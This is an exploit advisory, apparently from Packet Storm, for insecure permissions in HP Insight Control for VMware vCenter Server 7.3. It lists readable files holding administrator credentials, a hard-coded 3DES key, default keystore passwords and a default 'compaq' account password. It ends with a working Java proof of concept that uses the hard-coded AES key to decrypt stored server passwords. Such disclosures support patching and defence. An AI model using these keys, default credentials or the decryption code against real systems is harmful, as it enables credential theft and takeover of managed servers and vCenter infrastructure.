Twenty Year Anniversary

HP Insight Control For VMware vCenter Server 7.3 Insecure Permissions

HP Insight Control For VMware vCenter Server 7.3 Insecure Permissions
Posted Dec 28, 2017
Authored by Glafkos Charalambous

HP Insight Control for VMware vCenter Server version 7.3 allows a low privileged attacker to read sensitive information files, decrypt all configuration server passwords, and gain access to the systems which in turn leads to the compromise of the whole infrastructure.

tags | exploit
MD5 | c2a6b747186e5c0920f5dafb6cf4af43

HP Insight Control For VMware vCenter Server 7.3 Insecure Permissions

Change Mirror Download
/*
Exploit Title: HP Insight Control for VMware vCenter Server Multiple Vulnerabilities
Date: 11/05/2014
Author: Glafkos Charalambous
Version: 7.3
Vendor: HP
Vendor URL: http://www.hpe.com
HP Case: SSRT101619

Product Description: HP Insight Control for VMware vCenter Server (Insight Control for vCenter) is a single integrated application that you use to manage ProLiant servers and/or HP storage systems. The application consists of four modules. The core module is required along with at least one of the three optional
components.

Impact:
A low privilege attacker can read sensitive information files, decrypt all configuration server passwords and gain access to the above systems which in turn lead to the compromise of the whole infrastructure.

Vulnerabilities:

Local Insecure File Permissions Vulnerability
A local attacker can exploit this issue by gaining access to low privileged readable files and extracting sensitive information.

VMware vCenter Physical and Virtual Infrastructure configured servers include IP Addresses, Usernames and Encrypted passwords
C:\Program Files (x86)\HP\HP Insight Control for vCenter\icvc\hpcs\password.xml
Ex:
<password>
<username>Administrator</username>
<epassword>1Od6BZ6oCIkr5HY*********4F0Za0DJVR3tcDcwA=</epassword>
<host>172.30.8.101</host>
<type>Onboard Administrator</type>
<id>beae31de-fdf8-11e2-9c3e-005056ae52ee</id>
</password>
<password>
<username>root</username>
<epassword>q75k41lRU+RRQyuk*********QUGjPrB2l6+8VmiW1I=</epassword>
<host>172.30.8.161</host>
<type>ProLiant Server</type>
<id>f0df9f00-fdf8-11e2-bf51-005056ae52ee</id>
</password>
<password>
<username>Administrator</username>
<epassword>BC6j1QquVE1p*********hLdHMUOfRhcMLoE=</epassword>
<host>172.30.8.129</host>
<type>iLO</type>
<id>f7f0fd0f-0b28-11e3-8753-005056ae52ee</id>
</password>
<password>
<username>vadmin</username>
<epassword>kbdDWTHKDfx***********49eI93rDL+xRsJu1V8=</epassword>
<host>172.30.8.198</host>
<type>vCenter</type>
<id>d6c21e0f-99f5-11e3-ad68-005056ae52ee</id>
</password>


C:\Program Files (x86)\HP\HP Insight Control for vCenter\icvc\uim\config.json
Ex:
"db": { // Local Postgress
"username": "ic4vcdb",
"ip": "localhost",
"password": "qoelX2yfccmhtDdsHOKAE*********************JXbUFK4ANHoyznp4niXWJzx",
"port": "3506"
},
"vcenters": [
{
"username": "vadmin",
"ip": "172.30.9.183",
"password": "dmNsOek/My2dND7*************/RxgMe/30JJ2nTI="
}

Use of Hard-Coded Cryptographic Keys
Java EE Enteprise Archive (EAR) Files containing hard-coded AES CBC 128bit and 3DES encryption keys that are being used to encrypt configuration files which include password information
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\deployments\app_hpicsm_ear.ear
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\deployments\credentialStore_ear.ear
Etc..

Files containing Usernames and Encrypted 3DES Passwords (3DES Hardcoded Key: THr@winG s*m3 junk !$$248$#*&^)
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\hp_roles.properties
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\hp_users.properties
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\mgmt-users.properties

Use of default Keystore / Certificate Private Key Password
Keystore and PKCS #12 certificate containing private keys using a default password of "changeit"
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\vasa.keystore (Default keystore pass changeit)
C:\Program Files (x86)\HP\HP Insight Control for vCenter\JBoss\standalone\configuration\server.p12 (Default password changeit)

Use of default password of HP Common Services Password
<username>compaq</username>
<epassword>nhEeBy2mlbTbkitvVtAt2E0mnS5SXjCBE3JKtTGKru4=</epassword> = compaq123
<host>*</host>
<type>HP Common Services</type>


PoC AES-128-CBC Password Decryption
*/

import java.security.GeneralSecurityException;
import java.security.Key;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import org.apache.commons.net.util.Base64;


public class Start {

private static final byte[] IV = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
private static final byte[] KEY = { 116, 111, toUnsigned(155), 34, toUnsigned(240), 47, 126, toUnsigned(157), 19, 33, 75, 32, 26, 27, 122, toUnsigned(134) };

public static void main(String[] args) {

String ePassword = "qoelX2yfccmhtDdsHOKAE2W8R82buPd6jQX6AlqJ6JXbUFK4ANHoyznp4niXWJzx";
String decryptedPassword = decrypt(ePassword);
System.out.println("Password is: " + decryptedPassword);

}

public static String decrypt(String encryptedString)
{
try
{
Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
Key key = new SecretKeySpec(KEY, 0, KEY.length, "AES");
IvParameterSpec iv = new IvParameterSpec(IV, 0, IV.length);
cipher.init(2, key, iv);
byte[] encryptedBytes = Base64.decodeBase64(encryptedString.getBytes());

cipher.update(encryptedBytes);
byte[] decryptedBytes = cipher.doFinal(encryptedBytes);
String decryptedString = new String(decryptedBytes, 16, decryptedBytes.length - 16);
return decryptedString.trim();

}
catch (GeneralSecurityException e)
{
System.out.println("Password Decryption Error");
}
return null;
}

private static final byte toUnsigned(int value)
{
if (value < 128) {
return (byte)value;
}
return (byte)(value - 256);
}

}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    7 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    40 Files
  • 23
    May 23rd
    64 Files
  • 24
    May 24th
    55 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close